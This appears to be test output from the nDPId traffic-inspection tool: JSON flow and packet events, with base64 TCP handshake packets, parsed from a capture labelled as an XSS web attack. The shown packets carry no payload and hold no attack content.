+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347375388,"flow_last_seen":1499347375388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347375388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1499347375388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VfhAAD4Gb9isEAABwKgKMtzKAFDNpCPqAAAAAKACchAZDgAAAgQFtAQCCAoBOnYSAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3392,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1499347375388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3MqX5dxFzaQj66AScSBaVQAAAgQFtAQCCAoD5EeIATp2EgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1499347375389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347375389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VflAAD4Gb9+sEAABwKgKMtzKAFDNpCPrl+XcRoAQAOX5WwAAAQEICgE6dhMD5EeI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347376638,"flow_last_seen":1499347376638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347376638,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1499347376638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376638,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EqdAAD4GsymsEAABwKgKMtzYAFCvXmXsAAAAAKACchD0CgAAAgQFtAQCCAoBOndLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1499347376639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3NhWyE7Mr15l7aAScSACsAAAAgQFtAQCCAoD5EjBATp3SwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1499347376639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347376639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EqhAAD4GszCsEAABwKgKMtzYAFCvXmXtVshOzYAQAOWhtwAAAQEICgE6d0sD5EjB"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347379171,"flow_last_seen":1499347379171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347379171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1499347379171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NzVAAD4GjpusEAABwKgKMtzyAFA14k7xAAAAAKACchCB7wAAAgQFtAQCCAoBOnnEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1499347379171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3PK2Txs5NeJO8qAScSBiJwAAAgQFtAQCCAoD5Es6ATp5xAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1499347379172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347379172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NzZAAD4GjqKsEAABwKgKMtzyAFA14k7ytk8bOoAQAOUBLwAAAQEICgE6ecQD5Es6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347380424,"flow_last_seen":1499347380424,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347380424,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1499347380424,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PTxAAD4GiJSsEAABwKgKMt0AAFCXo0fBAAAAAKACchAmFwAAAgQFtAQCCAoBOnr9AAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1499347380424,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3QDrAYLNl6NHwqAScSBozwAAAgQFtAQCCAoD5ExzATp6\/QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1499347380425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347380425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PT1AAD4GiJusEAABwKgKMt0AAFCXo0fC6wGCzoAQAOUH1wAAAQEICgE6ev0D5Exz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347381694,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347381694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Vu9AAD4GbuGsEAABwKgKMt0OAFBD4SrUAAAAAKACchCVegAAAgQFtAQCCAoBOnw7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Q7aUZP1Q+Eq1aAScSDWfAAAAgQFtAQCCAoD5E2xATp8OwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3448,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1499347381694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VvBAAD4GbuisEAABwKgKMt0OAFBD4SrV2lGT9oAQAOV1hAAAAQEICgE6fDsD5E2x"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347384186,"flow_last_seen":1499347384186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384186,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1499347384186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bHdAAD4GWVmsEAABwKgKMt0oAFALKxLdAAAAAKACchDjngAAAgQFtAQCCAoBOn6qAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1499347384186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Sg6aAAMCysS3qAScSBWBQAAAgQFtAQCCAoD5FAgATp+qgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1499347384187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347384187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bHhAAD4GWWCsEAABwKgKMt0oAFALKxLeOmgADYAQAOX1DAAAAQEICgE6fqoD5FAg"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347385481,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347385481,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VSxAAD4GcKSsEAABwKgKMt02AFBQ3SrBAAAAAKACchCEtwAAAgQFtAQCCAoBOn\/tAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3TZsZa1KUN0qwqAScSAWnwAAAgQFtAQCCAoD5FFjATp\/7QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1499347385481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VS1AAD4GcKusEAABwKgKMt02AFBQ3SrCbGWtS4AQAOW1pQAAAQEICgE6f+4D5FFj"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347386736,"flow_last_seen":1499347386736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347386736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 